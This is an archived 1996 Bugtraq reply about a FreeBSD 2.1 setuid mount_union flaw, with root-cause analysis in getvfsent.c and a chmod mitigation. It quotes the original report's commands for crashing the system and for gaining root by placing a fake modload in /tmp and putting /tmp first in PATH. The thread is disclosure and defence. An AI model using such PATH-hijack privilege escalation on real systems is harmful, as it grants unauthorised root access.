Bugtraq mailing list archives
Re: BoS: SECURITY BUG in FreeBSD
From: root () edmweb com (Steve Reid)
Date: Fri, 17 May 1996 15:45:18 -0700
-----BEGIN PGP SIGNED MESSAGE-----
FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b
Hmm.... Needless to say, I've done a "chmod a-s /sbin/mount*" on all of the FreeBSD machines I operate (all are 2.1.0-RELEASE with minor changes). Ordinary users shouldn't be allowed to mount anything, anyway.
to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root!
Obviously, mount_union is depending on modload being on the $PATH, rather than using "/sbin/modload". It seems this is not a bug in mount_union itself, but in getvfsent.c... /usr/src/lib/libc/gen/getvfsent.c: [deletia] snprintf(name_mod, sizeof name_mod, "%s%s", name, "_mod"); status = execlp("modload", "modload", "-e", name_mod, "-o", name_mod, "-u", "-q", path, (const char *)0); exit(status ? errno : 0); } [EOF] Clearly, execlp() should be calling modload as "/sbin/modload" instead. Because this is a bug in getvfsent.c and not mount_union, it's possible that other mount_* commands would have the same hole if suid root. chmod a-s /sbin/mount* ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve () edmweb com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQEVAwUBMZ0AvNtVWdufMXJpAQGuJwf/eJsi8NIJ7FA0v/9aG7iv/8aW7q2KT97s zAvB744ziEpKniiPMRTfI2rhSA+a2ZjxlE4d5k1j6KfTBnEy2HICanWknvfZO7xI jjDLTooQ+rQHeSyGpVXBmAxsb3/n9AgNIsQ6zPPZGEUiO6wsGxt1v+SIlTdBN+Ea mHztl9vIX9JLbki8+Dv5fcmSSPTVkO1CKchP2NBEPUMUSLBkeco7QpJQwZd4g6n3 cRK9S5zXoVVSW56BHXew6WWzk8Ni/lxFlz0OcMBEpelXCY6HP1EHgSTfaJ2JEB/c MMkNaBwLSOjAlW7x/ZA66AarW64GXMBf2Jot28knfL4j+kPoJyEMPA== =m7Wb -----END PGP SIGNATURE-----
Current thread:
- TCP SYN probe detection tool available Doug Hughes (May 14)
- Re: TCP SYN probe detection tool available Brian Mitchell (May 15)
- information on syslog bug wanted ALEXANDER SCHUETZ (May 17)
- BoS: SECURITY BUG in FreeBSD Krzysztof Labanowski (May 17)
- Re: BoS: SECURITY BUG in FreeBSD Dan Cross (May 17)
- Re: BoS: SECURITY BUG in FreeBSD Steve Reid (May 17)
- <Possible follow-ups>
- Re: TCP SYN probe detection tool available redeye () compulink gr (May 15)
- Re: TCP SYN probe detection tool available Casper Dik (May 16)
- SunOS 4.1.4 fingerd Andy Dills (May 16)
- Re: SunOS 4.1.4 fingerd Dave Dittrich (May 16)
- Re: fingerd problems Elliot Lee (May 16)
- Re: fingerd problems Jon Lewis (May 16)
- Re: fingerd problems Brian Mitchell (May 16)
- Re: fingerd problems Robert A. Pickering Jr. (May 17)
- Re: TCP SYN probe detection tool available Casper Dik (May 16)
- Re: SunOS 4.1.4 fingerd Kevin at Paranoia (May 16)
- Re: SunOS 4.1.4 fingerd Christopher X. Candreva (May 16)
- Re: TCP SYN probe detection tool available Brian Mitchell (May 15)